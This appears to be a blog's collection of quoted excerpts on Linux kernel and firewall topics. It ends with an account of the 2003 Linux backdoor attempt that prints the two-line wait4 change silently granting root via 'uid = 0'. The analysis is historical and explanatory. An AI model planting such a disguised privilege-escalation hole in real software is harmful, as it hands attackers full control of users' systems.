Linus Torvalds says Linux kernel v5.0 ‘should be meaningless’

With the removal of old architecture and other bits of tidying up, with v4.17 RC1 there were more lines of code removed than added: something described as “probably a first. Ever. In the history of the universe. Or at least kernel releases.”

Source: Linus Torvalds says Linux kernel v5.0 ‘should be meaningless’

‘Kernel memory leaking’ Intel processor design flaw forces Linux, Windows redesign

A fundamental design flaw in Intel’s processor chips has forced a significant redesign of the Linux and Windows kernels to defang the chip-level security bug.

Source: ‘Kernel memory leaking’ Intel processor design flaw forces Linux, Windows redesign • The Register

There were rumors of a severe hypervisor bug – possibly in Xen – doing the rounds at the end of 2017. It may be that this hardware flaw is that rumored bug: that hypervisors can be attacked via this kernel memory access cockup, and thus need to be patched, forcing a mass restart of guest virtual machines.

How does iptables hashlimit module work?

Hashlimit is an iptables module that allows one to define rules that in effect will limit traffic speed (bytes / time unit) or frequency (connections / time unit) per target or origin ports / IPs. The inner workings of this module and / or how to make it work correctly remains a mystery for many.

Hashlimit is also close friends with the limit module, only much more powerful, capable of expressing rate limiting per source IP (for example) in a single rule.

Source: Stuff I do: How does iptables hashlimit module work?


The securelevel mechanism is intended to allow protecting the persistence of code and data on the system, or a subset thereof, from modification, even by the super-user by providing convenient means of “locking down” a system to a degree suited to its environment.

Source: NetBSD 6.1.5 – man page for secmodel_securelevel (netbsd section 9) – Unix & Linux Commands

Highly secure mode may seem Draconian, but is intended as a last line of defence should the super-user account be compromised. Its effects preclude circumvention of file flags by direct modification of a raw disk device, or erasure of a file system by means of newfs(8). Further, it can limit the potential damage of a compromised “firewall” by prohibiting the modification of packet filter rules. Preventing the system clock from being set backwards aids in post-mortem analysis and helps ensure the integrity of logs. Precision timekeeping is not affected because the clock may still be slowed.

Nasty Lockup Issue Still Being Investigated For Linux 3.18

It might be related to the kernel’s watchdog code due to research by Linus Torvalds. “So I’m looking at the watchdog code, and it seems racy [with regard to] parking and startup…Quite frankly, I’m just grasping for straws here, but a lot of the watchdog traces really have seemed spurious…”

via [Phoronix] Nasty Lockup Issue Still Being Investigated For Linux 3.18.

Be a kernel hacker

In this tutorial, we’ll develop a simple kernel module that creates a /dev/reverse device. A string written to this device is read back with the word order reversed (“Hello World” becomes “World Hello”). It is a popular programmer interview puzzle, and you are likely to get some bonus points when you show the ability to implement it at the kernel level as well. A word of warning before we start: a bug in your module may lead to a system crash and (unlikely, but possible) data loss.

via Be a kernel hacker | Linux Voice.

netfilter/iptables project homepage

nftables is the project that aims to replace the existing {ip,ip6,arp,eb}tables framework. Basically, this project provides a new packet filtering framework, a new userspace utility and also a compatibility layer for {ip,ip6}tables. nftables is built upon the building blocks of the Netfilter infrastructure such as the existing hooks, the connection tracking system, the userspace queueing component and the logging subsystem.

via netfilter/iptables project homepage – The “nftables” project.

From: Nftables: a new packet filtering engine

Packet filtering and firewalling has a long history in Linux. The first filtering mechanism, called “ipfwadm,” was released in 1995 for the 1.2.1 kernel. This code was used until the 2.2.0 stable release (January, 1999), when the new “ipchains” module took over. While ipchains was useful, it only lasted until 2.4.0 (January, 2001), when it, too, was replaced by iptables/netfilter, which remains in the kernel now. If netfilter maintainer Patrick McHardy has his way, though, iptables, too, will be gone in the future, replaced by yet another mechanism called “nftables.” This article will give an overview of how nftables works, followed by a discussion of the motivations behind this change.

The Linux Backdoor Attempt of 2003

What did the change do? This is where it gets really interesting. The change modified the code of a Linux function called wait4, which a program could use to wait for something to happen. Specifically, it added these two lines of code:

if ((options == (__WCLONE|__WALL)) && (current->uid = 0)) 
     retval = -EINVAL;

via The Linux Backdoor Attempt of 2003.

Setting the user ID to zero is a problem because user ID number zero is the “root” user, which is allowed to do absolutely anything it wants—to access all data, change the behavior of all code, and to compromise entirely the security of all parts of the system. So the effect of this code is to give root privileges to any piece of software that called wait4 in a particular way that is supposed to be invalid. In other words … it’s a classic backdoor.

The check should have been current -> uid == 0.  Sneaky!